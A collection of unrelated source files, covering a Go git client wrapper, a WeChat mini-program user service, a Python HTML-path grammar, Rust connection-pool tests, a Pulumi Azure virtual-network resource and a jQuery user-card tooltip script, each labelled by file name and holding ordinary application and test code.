return g.GitCLI.ListChangedFilesFromBranch(dir, branch)
}
// LoadFileFromBranch returns a files's contents from a branch
func (g *GitLocal) LoadFileFromBranch(dir string, branch string, file string) (string, error) {
return g.GitCLI.LoadFileFromBranch(dir, branch, file)
}
// FetchUnshallow does nothing
// Faked out
func (g *GitLocal) FetchUnshallow(dir string) error {
return g.GitFake.FetchUnshallow(dir)
}
// IsShallow runs git rev-parse --is-shallow-repository in dir
func (g *GitLocal) IsShallow(dir string) (bool, error) {
return g.GitCLI.IsShallow(dir)
}
// CreateBranchFrom creates a new branch called branchName from startPoint
func (g *GitLocal) CreateBranchFrom(dir string, branchName string, startPoint string) error {
return g.GitCLI.CreateBranchFrom(dir, branchName, startPoint)
}
// Merge merges the commitish into the current branch
func (g *GitLocal) Merge(dir string, commitish string) error {
return g.GitCLI.Merge(dir, commitish)
}
// GetLatestCommitSha returns the sha of the last commit
func (g *GitLocal) GetLatestCommitSha(dir string) (string, error) {
return g.GitCLI.GetLatestCommitSha(dir)
}
// GetFirstCommitSha gets the first commit sha
func (g *GitLocal) GetFirstCommitSha(dir string) (string, error) {
return g.GitCLI.GetFirstCommitSha(dir)
}
// Reset performs a git reset --hard back to the commitish specified
func (g *GitLocal) Reset(dir string, commitish string, hard bool) error {
	return g.GitCLI.Reset(dir, commitish, hard)
}
// RemoteUpdate performs a git remote update
// Faked out
func (g *GitLocal) RemoteUpdate(dir string) error {
return g.GitFake.RemoteUpdate(dir)
}
// LocalBranches will list all local branches
func (g *GitLocal) LocalBranches(dir string) ([]string, error) {
return g.GitCLI.LocalBranches(dir)
}
// MergeTheirs performs a cherry pick of commitish
func (g *GitLocal) MergeTheirs(dir string, commitish string) error {
return g.GitCLI.MergeTheirs(dir, commitish)
}
// RebaseTheirs runs git rebase upstream branch
func (g *GitLocal) RebaseTheirs(dir string, upstream string, branch string, skipEmpty bool) error {
	return g.GitCLI.RebaseTheirs(dir, upstream, branch, skipEmpty)
}
// GetCommits returns the commits in a range, exclusive of startSha and inclusive of endSha
func (g *GitLocal) GetCommits(dir string, startSha string, endSha string) ([]GitCommit, error) {
return g.GitCLI.GetCommits(dir, startSha, endSha)
}
// RevParse runs git rev parse
func (g *GitLocal) RevParse(dir string, rev string) (string, error) {
return g.GitCLI.RevParse(dir, rev)
}
// SetUpstreamTo will set the given branch to track the origin branch with the same name
func (g *GitLocal) SetUpstreamTo(dir string, branch string) error {
return g.GitCLI.SetUpstreamTo(dir, branch)
}
// Remotes will list the names of the remotes
func (g *GitLocal) Remotes(dir string) ([]string, error) {
return g.GitCLI.Remotes(dir)
}
// StashPop runs git stash pop
func (g *GitLocal) StashPop(dir string) error {
return g.GitCLI.StashPop(dir)
}
// CloneBare does nothing
func (g *GitLocal) CloneBare(dir string, url string) error {
return nil
}
// PushMirror does nothing
func (g *GitLocal) PushMirror(dir string, url string) error {
return nil
}
// GetCommitsNotOnAnyRemote returns a list of commits which are on branch but not present on a remote
func (g *GitLocal) GetCommitsNotOnAnyRemote(dir string, branch string) ([]GitCommit, error) {
return g.GitCLI.GetCommitsNotOnAnyRemote(dir, branch)
}
// CherryPick does a git cherry-pick of commit
func (g *GitLocal) CherryPick(dir string, commit string) error {
return g.GitCLI.CherryPick(dir, commit)
}
// CherryPickTheirs does a git cherry-pick of commit
func (g *GitLocal) CherryPickTheirs(dir string, commit string) error {
return g.GitCLI.CherryPickTheirs(dir, commit)
}
// CherryPickTheirsKeepRedundantCommits does a git cherry-pick of commit
func (g *GitLocal) CherryPickTheirsKeepRedundantCommits(dir string, commit string) error {
return g.GitCLI.CherryPickTheirsKeepRedundantCommits(dir, commit)
}
// Describe does a git describe of commitish, optionally adding the abbrev arg if not empty
func (g *GitLocal) Describe(dir string, contains bool, commitish string, abbrev string, fallback bool) (string, string, error) {
	return g.GitCLI.Describe(dir, contains, commitish, abbrev, fallback)
}
// IsAncestor checks if the possible ancestor commit-ish is an ancestor of the given commit-ish.
func (g *GitLocal) IsAncestor(dir string, possibleAncestor string, commitish string) (bool, error) {
return g.GitCLI.IsAncestor(dir, possibleAncestor, commitish)
}
// WriteRepoAttributes writes the given content to .git/info/attributes
func (g *GitLocal) WriteRepoAttributes(dir string, content string) error {
return g.GitCLI.WriteRepoAttributes(dir, content)
}
// ReadRepoAttributes reads the existing content, if any, in .git/info/attributes
func (g *GitLocal) ReadRepoAttributes(dir string) (string, error) {
return g.GitCLI.ReadRepoAttributes(dir)
}
ma_user.go | package ma
import (
"encoding/json"
"github.com/cliod/wx-go/common"
"github.com/cliod/wx-go/common/util"
)
type WxMaUserService interface {
	// GetSessionInfo exchanges the jsCode for an openid/session
	GetSessionInfo(jsCode string) (*JsCode2SessionResult, error)
	// GetUserInfo decrypts sensitive user data
	GetUserInfo(sessionKey, encryptedData, ivStr string) (*UserInfo, error)
	// GetPhoneNoInfo decrypts the user's phone number information.
	GetPhoneNoInfo(sessionKey, encryptedData, ivStr string) (*PhoneNumberInfo, error)
	// CheckUserInfo verifies the integrity of the user info
	CheckUserInfo(sessionKey, rawData, signature string) bool
	/* SetUserStorage reports user data to the backend.
	   Mini games can use this API to report key-value data to the user's CloudStorage.
	   Docs: https://developers.weixin.qq.com/minigame/dev/document/open-api/data/setUserStorage.html */
SetUserStorage(kvMap map[string]string, sessionKey, openid string) error
}
type WxMaUserServiceImpl struct {
service WxMaService
}
func newWxMaUserService(service WxMaService) *WxMaUserServiceImpl {
return &WxMaUserServiceImpl{
service: service,
}
}
func (u *WxMaUserServiceImpl) GetSessionInfo(jsCode string) (*JsCode2SessionResult, error) {
	return u.service.JsCode2SessionInfo(jsCode)
}
func (u *WxMaUserServiceImpl) GetUserInfo(sessionKey, encryptedData, ivStr string) (*UserInfo, error) {
return GetUserInfo(sessionKey, encryptedData, ivStr)
}
func (u *WxMaUserServiceImpl) GetPhoneNoInfo(sessionKey, encryptedData, ivStr string) (*PhoneNumberInfo, error) {
return GetPhoneNoInfo(sessionKey, encryptedData, ivStr)
}
func (u *WxMaUserServiceImpl) CheckUserInfo(sessionKey, rawData, signature string) bool {
return CheckUserInfo(sessionKey, rawData, signature)
}
func (u *WxMaUserServiceImpl) SetUserStorage(kvMap map[string]string, sessionKey, openid string) error {
c := u.service.GetWxMaConfig()
var param = map[string]interface{}{}
var arr []interface{}
for k, v := range kvMap {
arr = append(arr, map[string]interface{}{"key": k, "value": v})
}
param["kv_list"] = arr
b, err := json.Marshal(param)
if err != nil {
return err
}
sign := util.HmacSha256(string(b), sessionKey)
_, err = u.service.Post(common.MaSetUserStorage, common.PostJsonContentType, param, c.GetAppID(), sign, openid, "hmac_sha256")
return err
}
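// Illustrative sketch (added): per the call above, the "hmac_sha256" signature
// is an HMAC-SHA256 of the raw JSON body keyed by the session key. With the
// standard library it would look roughly like this (assuming util.HmacSha256
// hex-encodes its result):
//
//	mac := hmac.New(sha256.New, []byte(sessionKey)) // crypto/hmac, crypto/sha256
//	mac.Write(b)
//	sign := hex.EncodeToString(mac.Sum(nil)) // encoding/hex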
html_path_reader.py | from parsimonious.grammar import Grammar
from .. import html_paths
def read_html_path(string):
path_node = _grammar.parse(string)
return read_html_path_node(path_node)
def read_html_path_node(path_node):
if path_node.children[0].expr_name == "ignore":
return html_paths.ignore
elif path_node.children[0].children:
return _read_html_path_elements_node(path_node.children[0].children[0])
else:
return html_paths.empty
def _read_html_path_elements_node(path_node):
elements = [
_read_element_node(child)
for child in _repeated_children_with_separator(path_node, has_whitespace=True)
]
return html_paths.path(elements)
def _read_element_node(node):
tag_names = _read_tag_names_node(node.children[0])
class_names = _read_class_names_node(node.children[1])
fresh = _read_fresh_node(node.children[2])
return html_paths.element(tag_names, class_names=class_names, fresh=fresh)
def _read_tag_names_node(node):
return [
child.text
for child in _repeated_children_with_separator(node, has_whitespace=False)
]
def _read_class_names_node(class_names_node):
return [
_read_class_name_node(node)
for node in class_names_node.children
]
def _read_class_name_node(node):
return node.children[1].text
def _read_fresh_node(node):
return len(node.children) > 0
def _repeated_children_with_separator(node, has_whitespace):
yield node.children[0]
if has_whitespace:
sequence_node_index = 3
else:
sequence_node_index = 1
sequence_node = node.children[1]
for child in sequence_node.children:
yield child.children[sequence_node_index]
grammar_text = r"""
html_path = ignore / html_path_elements?
ignore = "!"
html_path_elements = element (whitespace* ">" whitespace* element)*
element = tag_names class_name* fresh?
tag_names = identifier ("|" identifier)*
class_name = "." identifier
fresh = ":fresh"
identifier = ~"[A-Z0-9]+"i
whitespace = ~"\s"*
"""
_grammar = Grammar(grammar_text)
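# Illustrative usage (added): the grammar above accepts paths such as
# "p.tip:fresh > strong|em" -- a fresh <p class="tip"> followed by an element
# that may be either <strong> or <em>. The example string is made up:
#
#   path = read_html_path("p.tip:fresh > strong|em")
#   # -> html_paths.path([
#   #        html_paths.element(["p"], class_names=["tip"], fresh=True),
#   #        html_paths.element(["strong", "em"], class_names=[], fresh=False),
#   #    ])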
test.rs | use antidote::Mutex;
use std::sync::atomic::{
AtomicBool, AtomicIsize, AtomicUsize, Ordering, ATOMIC_BOOL_INIT, ATOMIC_USIZE_INIT,
};
use std::sync::mpsc::{self, Receiver, SyncSender};
use std::time::Duration;
use std::{error, fmt, mem, thread};
use {CustomizeConnection, ManageConnection, Pool};
#[derive(Debug)]
pub struct Error;
impl fmt::Display for Error {
fn fmt(&self, fmt: &mut fmt::Formatter) -> fmt::Result {
fmt.write_str("blammo")
}
}
impl error::Error for Error {
fn description(&self) -> &str {
"Error"
}
}
#[derive(Debug, PartialEq)]
struct FakeConnection(bool);
struct OkManager;
impl ManageConnection for OkManager {
type Connection = FakeConnection;
type Error = Error;
fn connect(&self) -> Result<FakeConnection, Error> {
Ok(FakeConnection(true))
}
fn is_valid(&self, _: &mut FakeConnection) -> Result<(), Error> {
Ok(())
}
fn has_broken(&self, _: &mut FakeConnection) -> bool {
false
}
}
struct NthConnectFailManager {
n: Mutex<u32>,
}
impl ManageConnection for NthConnectFailManager {
type Connection = FakeConnection;
type Error = Error;
fn connect(&self) -> Result<FakeConnection, Error> {
let mut n = self.n.lock();
if *n > 0 {
*n -= 1;
Ok(FakeConnection(true))
} else {
Err(Error)
}
}
fn is_valid(&self, _: &mut FakeConnection) -> Result<(), Error> {
Ok(())
}
fn has_broken(&self, _: &mut FakeConnection) -> bool {
false
}
}
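// (Added note, illustrative) This manager vends exactly `n` good connections
// and then starts failing, which is what lets the tests below exercise both a
// successful pool fill-up and connect errors:
//
//     let m = NthConnectFailManager { n: Mutex::new(1) };
//     assert!(m.connect().is_ok());
//     assert!(m.connect().is_err());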
#[test]
fn test_max_size_ok() {
let manager = NthConnectFailManager { n: Mutex::new(5) };
let pool = Pool::builder().max_size(5).build(manager).unwrap();
let mut conns = vec![];
for _ in 0..5 {
conns.push(pool.get().ok().unwrap());
}
}
#[test]
fn test_acquire_release() {
let pool = Pool::builder().max_size(2).build(OkManager).unwrap();
let conn1 = pool.get().ok().unwrap();
let conn2 = pool.get().ok().unwrap();
drop(conn1);
let conn3 = pool.get().ok().unwrap();
drop(conn2);
drop(conn3);
}
#[test]
fn try_get() {
let pool = Pool::builder().max_size(2).build(OkManager).unwrap();
let conn1 = pool.try_get();
let conn2 = pool.try_get();
let conn3 = pool.try_get();
assert!(conn1.is_some());
assert!(conn2.is_some());
assert!(conn3.is_none());
drop(conn1);
assert!(pool.try_get().is_some());
}
#[test]
fn test_is_send_sync() {
fn is_send_sync<T: Send + Sync>() {}
is_send_sync::<Pool<OkManager>>();
}
#[test]
fn test_issue_2_unlocked_during_is_valid() {
struct BlockingChecker {
first: AtomicBool,
s: Mutex<SyncSender<()>>,
r: Mutex<Receiver<()>>,
}
impl ManageConnection for BlockingChecker {
type Connection = FakeConnection;
type Error = Error;
fn connect(&self) -> Result<FakeConnection, Error> {
Ok(FakeConnection(true))
}
fn is_valid(&self, _: &mut FakeConnection) -> Result<(), Error> {
if self.first.compare_and_swap(true, false, Ordering::SeqCst) {
self.s.lock().send(()).unwrap();
self.r.lock().recv().unwrap();
}
Ok(())
}
fn has_broken(&self, _: &mut FakeConnection) -> bool {
false
}
}
let (s1, r1) = mpsc::sync_channel(0);
let (s2, r2) = mpsc::sync_channel(0);
let manager = BlockingChecker {
first: AtomicBool::new(true),
s: Mutex::new(s1),
r: Mutex::new(r2),
};
let pool = Pool::builder()
.test_on_check_out(true)
.max_size(2)
.build(manager)
.unwrap();
let p2 = pool.clone();
let t = thread::spawn(move || {
p2.get().ok().unwrap();
});
r1.recv().unwrap();
// get call by other task has triggered the health check
pool.get().ok().unwrap();
s2.send(()).ok().unwrap();
t.join().ok().unwrap();
}
#[test]
fn test_drop_on_broken() {
static DROPPED: AtomicBool = ATOMIC_BOOL_INIT;
DROPPED.store(false, Ordering::SeqCst);
struct Connection;
impl Drop for Connection {
fn drop(&mut self) {
DROPPED.store(true, Ordering::SeqCst);
}
}
struct Handler;
impl ManageConnection for Handler {
type Connection = Connection;
type Error = Error;
fn connect(&self) -> Result<Connection, Error> {
Ok(Connection)
}
fn is_valid(&self, _: &mut Connection) -> Result<(), Error> {
Ok(())
}
fn has_broken(&self, _: &mut Connection) -> bool {
true
}
}
let pool = Pool::new(Handler).unwrap();
drop(pool.get().ok().unwrap());
assert!(DROPPED.load(Ordering::SeqCst));
}
#[test]
fn test_initialization_failure() {
let manager = NthConnectFailManager { n: Mutex::new(0) };
let err = Pool::builder()
.connection_timeout(Duration::from_secs(1))
.build(manager)
.err()
.unwrap();
assert!(err.to_string().contains("blammo"));
}
#[test]
fn test_lazy_initialization_failure() {
let manager = NthConnectFailManager { n: Mutex::new(0) };
let pool = Pool::builder()
.connection_timeout(Duration::from_secs(1))
.build_unchecked(manager);
let err = pool.get().err().unwrap();
assert!(err.to_string().contains("blammo"));
}
#[test]
fn test_get_timeout() {
let pool = Pool::builder()
.max_size(1)
.connection_timeout(Duration::from_secs(1))
.build(OkManager)
.unwrap();
let _c = pool.get().unwrap();
pool.get().err().unwrap();
}
#[test]
fn test_connection_customizer() {
static RELEASED: AtomicBool = ATOMIC_BOOL_INIT;
RELEASED.store(false, Ordering::SeqCst);
static DROPPED: AtomicBool = ATOMIC_BOOL_INIT;
DROPPED.store(false, Ordering::SeqCst);
struct Connection(i32);
impl Drop for Connection {
fn drop(&mut self) {
DROPPED.store(true, Ordering::SeqCst);
}
}
struct Handler;
impl ManageConnection for Handler {
type Connection = Connection;
type Error = Error;
fn connect(&self) -> Result<Connection, Error> {
Ok(Connection(0))
}
fn is_valid(&self, _: &mut Connection) -> Result<(), Error> {
Ok(())
}
fn has_broken(&self, _: &mut Connection) -> bool {
true
}
}
#[derive(Debug)]
struct Customizer;
impl CustomizeConnection<Connection, Error> for Customizer {
fn on_acquire(&self, conn: &mut Connection) -> Result<(), Error> {
if !DROPPED.load(Ordering::SeqCst) {
Err(Error)
} else {
conn.0 = 1;
Ok(())
}
}
fn on_release(&self, _: Connection) {
RELEASED.store(true, Ordering::SeqCst);
}
}
let pool = Pool::builder()
.connection_customizer(Box::new(Customizer))
.build(Handler)
.unwrap();
{
let conn = pool.get().unwrap();
assert_eq!(1, conn.0);
assert!(!RELEASED.load(Ordering::SeqCst));
assert!(DROPPED.load(Ordering::SeqCst));
}
assert!(RELEASED.load(Ordering::SeqCst));
}
#[test]
fn test_idle_timeout() {
static DROPPED: AtomicUsize = ATOMIC_USIZE_INIT;
struct Connection;
impl Drop for Connection {
fn drop(&mut self) {
DROPPED.fetch_add(1, Ordering::SeqCst);
}
}
struct Handler(AtomicIsize);
impl ManageConnection for Handler {
type Connection = Connection;
type Error = Error;
fn connect(&self) -> Result<Connection, Error> {
if self.0.fetch_sub(1, Ordering::SeqCst) > 0 {
Ok(Connection)
} else {
Err(Error)
}
}
fn is_valid(&self, _: &mut Connection) -> Result<(), Error> {
Ok(())
}
fn has_broken(&self, _: &mut Connection) -> bool {
false
}
}
let pool = Pool::builder()
.max_size(5)
.idle_timeout(Some(Duration::from_secs(1)))
.reaper_rate(Duration::from_secs(1))
.build(Handler(AtomicIsize::new(5)))
.unwrap();
let conn = pool.get().unwrap();
thread::sleep(Duration::from_secs(2));
assert_eq!(4, DROPPED.load(Ordering::SeqCst));
drop(conn);
assert_eq!(4, DROPPED.load(Ordering::SeqCst));
}
#[test]
fn idle_timeout_partial_use() {
static DROPPED: AtomicUsize = ATOMIC_USIZE_INIT;
struct Connection;
impl Drop for Connection {
fn drop(&mut self) {
DROPPED.fetch_add(1, Ordering::SeqCst);
}
}
struct Handler(AtomicIsize);
impl ManageConnection for Handler {
type Connection = Connection;
type Error = Error;
fn connect(&self) -> Result<Connection, Error> {
if self.0.fetch_sub(1, Ordering::SeqCst) > 0 {
Ok(Connection)
} else {
Err(Error)
}
}
fn is_valid(&self, _: &mut Connection) -> Result<(), Error> {
Ok(())
}
fn has_broken(&self, _: &mut Connection) -> bool {
false
}
}
let pool = Pool::builder()
.max_size(5)
.idle_timeout(Some(Duration::from_secs(1)))
.reaper_rate(Duration::from_secs(1))
.build(Handler(AtomicIsize::new(5)))
.unwrap();
for _ in 0..8 {
thread::sleep(Duration::from_millis(250));
pool.get().unwrap();
}
assert_eq!(4, DROPPED.load(Ordering::SeqCst));
assert_eq!(1, pool.state().connections);
}
#[test]
fn test_max_lifetime() {
static DROPPED: AtomicUsize = ATOMIC_USIZE_INIT;
struct Connection;
impl Drop for Connection {
fn drop(&mut self) {
DROPPED.fetch_add(1, Ordering::SeqCst);
}
}
struct Handler(AtomicIsize);
impl ManageConnection for Handler {
type Connection = Connection;
type Error = Error;
fn connect(&self) -> Result<Connection, Error> {
if self.0.fetch_sub(1, Ordering::SeqCst) > 0 {
Ok(Connection)
} else {
Err(Error)
}
}
fn is_valid(&self, _: &mut Connection) -> Result<(), Error> {
Ok(())
}
fn has_broken(&self, _: &mut Connection) -> bool {
false
}
}
let pool = Pool::builder()
.max_size(5)
.max_lifetime(Some(Duration::from_secs(1)))
.connection_timeout(Duration::from_secs(1))
.reaper_rate(Duration::from_secs(1))
.build(Handler(AtomicIsize::new(5)))
.unwrap();
let conn = pool.get().unwrap();
thread::sleep(Duration::from_secs(2));
assert_eq!(4, DROPPED.load(Ordering::SeqCst));
drop(conn);
thread::sleep(Duration::from_secs(2));
assert_eq!(5, DROPPED.load(Ordering::SeqCst));
assert!(pool.get().is_err());
}
#[test]
fn min_idle() {
struct Connection;
struct Handler;
impl ManageConnection for Handler {
type Connection = Connection;
type Error = Error;
fn connect(&self) -> Result<Connection, Error> {
Ok(Connection)
}
fn is_valid(&self, _: &mut Connection) -> Result<(), Error> {
Ok(())
}
fn has_broken(&self, _: &mut Connection) -> bool {
false
}
}
let pool = Pool::builder()
.max_size(5)
.min_idle(Some(2))
.build(Handler)
.unwrap();
thread::sleep(Duration::from_secs(1));
assert_eq!(2, pool.state().idle_connections);
assert_eq!(2, pool.state().connections);
    let conns = (0..3).map(|_| pool.get().unwrap()).collect::<Vec<_>>();
    thread::sleep(Duration::from_secs(1));
assert_eq!(2, pool.state().idle_connections);
assert_eq!(5, pool.state().connections);
mem::drop(conns);
assert_eq!(5, pool.state().idle_connections);
assert_eq!(5, pool.state().connections);
}
#[test]
fn conns_drop_on_pool_drop() {
static DROPPED: AtomicUsize = ATOMIC_USIZE_INIT;
struct Connection;
impl Drop for Connection {
fn drop(&mut self) {
DROPPED.fetch_add(1, Ordering::SeqCst);
}
}
struct Handler;
impl ManageConnection for Handler {
type Connection = Connection;
type Error = Error;
fn connect(&self) -> Result<Connection, Error> {
Ok(Connection)
}
fn is_valid(&self, _: &mut Connection) -> Result<(), Error> {
Ok(())
}
fn has_broken(&self, _: &mut Connection) -> bool {
false
}
}
let pool = Pool::builder()
.max_lifetime(Some(Duration::from_secs(10)))
.max_size(10)
.build(Handler)
.unwrap();
drop(pool);
for _ in 0..10 {
if DROPPED.load(Ordering::SeqCst) == 10 {
return;
}
thread::sleep(Duration::from_secs(1));
}
panic!("timed out waiting for connections to drop");
}
virtualNetwork.go | // *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
// *** Do not edit by hand unless you're certain you know what you are doing! ***
package network
import (
"reflect"
"github.com/pkg/errors"
"github.com/pulumi/pulumi/sdk/v2/go/pulumi"
)
// Manages a virtual network including any configured subnets. Each subnet can
// optionally be configured with a security group to be associated with the subnet.
//
// > **NOTE on Virtual Networks and Subnets:** This provider currently
// provides both a standalone Subnet resource, and allows for Subnets to be defined in-line within the Virtual Network resource.
// At this time you cannot use a Virtual Network with in-line Subnets in conjunction with any Subnet resources. Doing so will cause a conflict of Subnet configurations and will overwrite Subnets.
type VirtualNetwork struct {
pulumi.CustomResourceState
	// The address space that is used by the virtual
// network. You can supply more than one address space. Changing this forces
// a new resource to be created.
AddressSpaces pulumi.StringArrayOutput `pulumi:"addressSpaces"`
// A `ddosProtectionPlan` block as documented below.
DdosProtectionPlan VirtualNetworkDdosProtectionPlanPtrOutput `pulumi:"ddosProtectionPlan"`
// List of IP addresses of DNS servers
DnsServers pulumi.StringArrayOutput `pulumi:"dnsServers"`
// The GUID of the virtual network.
Guid pulumi.StringOutput `pulumi:"guid"`
// The location/region where the virtual network is
// created. Changing this forces a new resource to be created.
Location pulumi.StringOutput `pulumi:"location"`
// The name of the virtual network. Changing this forces a
// new resource to be created.
Name pulumi.StringOutput `pulumi:"name"`
// The name of the resource group in which to
// create the virtual network.
ResourceGroupName pulumi.StringOutput `pulumi:"resourceGroupName"`
// Can be specified multiple times to define multiple
// subnets. Each `subnet` block supports fields documented below.
Subnets VirtualNetworkSubnetArrayOutput `pulumi:"subnets"`
// A mapping of tags to assign to the resource.
Tags pulumi.StringMapOutput `pulumi:"tags"`
}
// NewVirtualNetwork registers a new resource with the given unique name, arguments, and options.
func NewVirtualNetwork(ctx *pulumi.Context,
name string, args *VirtualNetworkArgs, opts ...pulumi.ResourceOption) (*VirtualNetwork, error) {
if args == nil || args.AddressSpaces == nil {
return nil, errors.New("missing required argument 'AddressSpaces'")
}
if args == nil || args.ResourceGroupName == nil {
return nil, errors.New("missing required argument 'ResourceGroupName'")
}
if args == nil {
args = &VirtualNetworkArgs{}
}
var resource VirtualNetwork
err := ctx.RegisterResource("azure:network/virtualNetwork:VirtualNetwork", name, args, &resource, opts...)
if err != nil {
return nil, err
}
return &resource, nil
}
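// Illustrative usage (added): from calling code, AddressSpaces and
// ResourceGroupName are the two required arguments enforced above; all values
// here are placeholders:
//
//	vnet, err := NewVirtualNetwork(ctx, "example", &VirtualNetworkArgs{
//		AddressSpaces:     pulumi.StringArray{pulumi.String("10.0.0.0/16")},
//		ResourceGroupName: pulumi.String("example-resources"),
//	})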
// GetVirtualNetwork gets an existing VirtualNetwork resource's state with the given name, ID, and optional
// state properties that are used to uniquely qualify the lookup (nil if not required).
func GetVirtualNetwork(ctx *pulumi.Context,
name string, id pulumi.IDInput, state *VirtualNetworkState, opts ...pulumi.ResourceOption) (*VirtualNetwork, error) {
var resource VirtualNetwork
err := ctx.ReadResource("azure:network/virtualNetwork:VirtualNetwork", name, id, state, &resource, opts...)
	if err != nil {
		return nil, err
	}
return &resource, nil
}
// Input properties used for looking up and filtering VirtualNetwork resources.
type virtualNetworkState struct {
	// The address space that is used by the virtual
// network. You can supply more than one address space. Changing this forces
// a new resource to be created.
AddressSpaces []string `pulumi:"addressSpaces"`
// A `ddosProtectionPlan` block as documented below.
DdosProtectionPlan *VirtualNetworkDdosProtectionPlan `pulumi:"ddosProtectionPlan"`
// List of IP addresses of DNS servers
DnsServers []string `pulumi:"dnsServers"`
// The GUID of the virtual network.
Guid *string `pulumi:"guid"`
// The location/region where the virtual network is
// created. Changing this forces a new resource to be created.
Location *string `pulumi:"location"`
// The name of the virtual network. Changing this forces a
// new resource to be created.
Name *string `pulumi:"name"`
// The name of the resource group in which to
// create the virtual network.
ResourceGroupName *string `pulumi:"resourceGroupName"`
// Can be specified multiple times to define multiple
// subnets. Each `subnet` block supports fields documented below.
Subnets []VirtualNetworkSubnet `pulumi:"subnets"`
// A mapping of tags to assign to the resource.
Tags map[string]string `pulumi:"tags"`
}
type VirtualNetworkState struct {
	// The address space that is used by the virtual
// network. You can supply more than one address space. Changing this forces
// a new resource to be created.
AddressSpaces pulumi.StringArrayInput
// A `ddosProtectionPlan` block as documented below.
DdosProtectionPlan VirtualNetworkDdosProtectionPlanPtrInput
// List of IP addresses of DNS servers
DnsServers pulumi.StringArrayInput
// The GUID of the virtual network.
Guid pulumi.StringPtrInput
// The location/region where the virtual network is
// created. Changing this forces a new resource to be created.
Location pulumi.StringPtrInput
// The name of the virtual network. Changing this forces a
// new resource to be created.
Name pulumi.StringPtrInput
// The name of the resource group in which to
// create the virtual network.
ResourceGroupName pulumi.StringPtrInput
// Can be specified multiple times to define multiple
// subnets. Each `subnet` block supports fields documented below.
Subnets VirtualNetworkSubnetArrayInput
// A mapping of tags to assign to the resource.
Tags pulumi.StringMapInput
}
func (VirtualNetworkState) ElementType() reflect.Type {
return reflect.TypeOf((*virtualNetworkState)(nil)).Elem()
}
type virtualNetworkArgs struct {
	// The address space that is used by the virtual
// network. You can supply more than one address space. Changing this forces
// a new resource to be created.
AddressSpaces []string `pulumi:"addressSpaces"`
// A `ddosProtectionPlan` block as documented below.
DdosProtectionPlan *VirtualNetworkDdosProtectionPlan `pulumi:"ddosProtectionPlan"`
// List of IP addresses of DNS servers
DnsServers []string `pulumi:"dnsServers"`
// The location/region where the virtual network is
// created. Changing this forces a new resource to be created.
Location *string `pulumi:"location"`
// The name of the virtual network. Changing this forces a
// new resource to be created.
Name *string `pulumi:"name"`
// The name of the resource group in which to
// create the virtual network.
ResourceGroupName string `pulumi:"resourceGroupName"`
// Can be specified multiple times to define multiple
// subnets. Each `subnet` block supports fields documented below.
Subnets []VirtualNetworkSubnet `pulumi:"subnets"`
// A mapping of tags to assign to the resource.
Tags map[string]string `pulumi:"tags"`
}
// The set of arguments for constructing a VirtualNetwork resource.
type VirtualNetworkArgs struct {
	// The address space that is used by the virtual
// network. You can supply more than one address space. Changing this forces
// a new resource to be created.
AddressSpaces pulumi.StringArrayInput
// A `ddosProtectionPlan` block as documented below.
DdosProtectionPlan VirtualNetworkDdosProtectionPlanPtrInput
// List of IP addresses of DNS servers
DnsServers pulumi.StringArrayInput
// The location/region where the virtual network is
// created. Changing this forces a new resource to be created.
Location pulumi.StringPtrInput
// The name of the virtual network. Changing this forces a
// new resource to be created.
Name pulumi.StringPtrInput
// The name of the resource group in which to
// create the virtual network.
ResourceGroupName pulumi.StringInput
// Can be specified multiple times to define multiple
// subnets. Each `subnet` block supports fields documented below.
Subnets VirtualNetworkSubnetArrayInput
// A mapping of tags to assign to the resource.
Tags pulumi.StringMapInput
}
func (VirtualNetworkArgs) ElementType() reflect.Type {
return reflect.TypeOf((*virtualNetworkArgs)(nil)).Elem()
}
com.ucard.js | /**
* 绑定用户小名片
*/
function ucard() {
    $('[ucard]').qtip({ // Grab some elements to apply the tooltip to
suppress: true,
content: {
text: function (event, api) {
var uid = $(this).attr('ucard');
$.get(U('Ucenter/Public/getProfile'), {uid: uid}, function (userProfile) {
var follow = '';
if ((MID != uid) && (MID != 0)) {
follow = '<button type="button" class="btn btn-default" onclick="talker.start_talk(\'' + userProfile.uid + '\')" style="float: right;margin: 5px 0;padding: 2px 12px;margin-left: 8px;">聊 天</button>';
if (userProfile.followed == 1) {
follow += '<button type="button" class="btn btn-default" onclick="ufollow(this,\'' + userProfile.uid + '\')" style="float: right;margin: 5px 0;padding: 2px 12px;"><font title="取消关注">已关注</font></button>';
} else {
follow += '<button type="button" class="btn btn-primary" onclick="ufollow(this,\'' + userProfile.uid + '\')" style="float: right;margin: 5px 0;padding: 2px 12px;">关 注</button>';
}
}
var html = '<div class="row" style="width: 350px;width: 350px;font-size: 13px;line-height: 23px;">' +
'<div class="col-xs-12" style="padding: 2px;">' +
'<img class="img-responsive" src="' + window.Think.ROOT + '/Public/images/qtip_bg.png">' +
'</div>' +
'<div class="col-xs-12" style="padding: 2px;margin-top: -25px;">' +
'<div class="col-xs-3">' +
'<img src="{$userProfile.avatar64}" class="avatar-img img-responsive" style=""/>' +
'</div>' +
'<div class="col-xs-9" style="padding-top: 25px;padding-right:0px;font-size: 12px;">' +
'<div style="font-size: 16px;font-weight: bold;"><a href="{$userProfile.space_url}" title="">{$userProfile.nickname}</a>{$userProfile.rank_link}' +
'</div>' +
'<div>' +
'<a href="{$userProfile.following_url}" title="关注数" target="_black">关注:{$userProfile.following}</a> ' +
'<a href="{$userProfile.fans_url}" title="粉丝数" target="_black">粉丝:{$userProfile.fans}</a> ' +
'</div>' +
'<div style="margin-bottom: 15px;color: #848484">' +
'个性签名:' +
'<span>' +
'{$userProfile.signature}' +
'</span>' +
'</div>' +
'</div>' +
'</div>' +
'<div class="col-xs-12" style="background: #f1f1f1;">' +
follow +
'</div>' +
'</div>';
userProfile.signature = userProfile.signature === '' ? '还没想好O(∩_∩)O' : userProfile.signature;
for (var key in userProfile) {
html = html.replace('{$userProfile.' + key + '}', userProfile[key]);
}
//alert(html);
var tpl = $(html);
api.set('content.text', tpl.html());
}, 'json');
return '获取数据中...'
}
}, position: {
viewport: $(window)
}, show: {
solo: true,
delay: 500
}, style: {
classes: 'qtip-bootstrap'
}, hide: {
delay: 500, fixed: true
}
})
}
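// Illustrative usage (added): call once the DOM is ready so every element
// rendered with a `ucard` attribute picks up the lazy-loaded profile tooltip:
//
//     $(function () { ucard(); });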
index.ts | import * as core from '@spyglassmc/core'
import { localeQuote, localize } from '@spyglassmc/locales'
import * as mcdoc from '@spyglassmc/mcdoc'
import type { NbtByteNode, NbtCompoundNode, NbtNode, NbtNumberNode, NbtPathNode, NbtPrimitiveArrayNode, NbtPrimitiveNode } from '../node/index.js'
